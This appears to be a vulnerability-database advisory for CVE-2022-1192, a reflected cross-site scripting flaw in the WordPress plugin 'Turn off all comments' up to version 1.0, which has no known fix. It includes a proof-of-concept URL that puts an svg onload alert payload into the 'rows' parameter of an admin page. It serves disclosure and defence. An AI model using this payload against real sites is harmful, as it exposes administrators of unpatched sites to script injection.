WordPress Plugin Vulnerabilities

Turn off all comments <= 1.0 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape the rows parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting

Proof of Concept

https://example.com/wp-admin/tools.php?page=toac&status=success&rows=%3Csvg%2Fonload%3Dalert%28%2Fxss%2F%29%3E

Affects Plugins

Plugin icon
turn-off-comments-for-all-posts
No known fix

References

CVE
CVE-2022-1192

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
p7e4
Submitter
p7e4
Submitter website
https://github.com/p7e4
Submitter twitter
p7e4_
Verified
Yes
WPVDB ID
18660c71-5a89-4ef6-b0dd-7a166e3449d6

Timeline

Publicly Published
2022-04-26 (about 2 years ago)
Added
2022-04-26 (about 2 years ago)
Last Updated
2022-04-27 (about 2 years ago)

Other

Published
Title
Published
2023-11-09
Title
Simple Site Verify < 1.0.8 - Admin+ Stored XSS
Published
2021-08-25
Title
Multiple Plugins - Reflected Cross-Site Scripting via PHPRelativePath Library
Published
2021-10-11
Title
WP Header Images < 2.0.1 - Reflected Cross-Site Scripting
Published
2016-04-12
Title
WPSOLR <= 8.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
Published
2021-09-09
Title
Edit Comments XT <= 1.0 - Reflected Cross-Site Scripting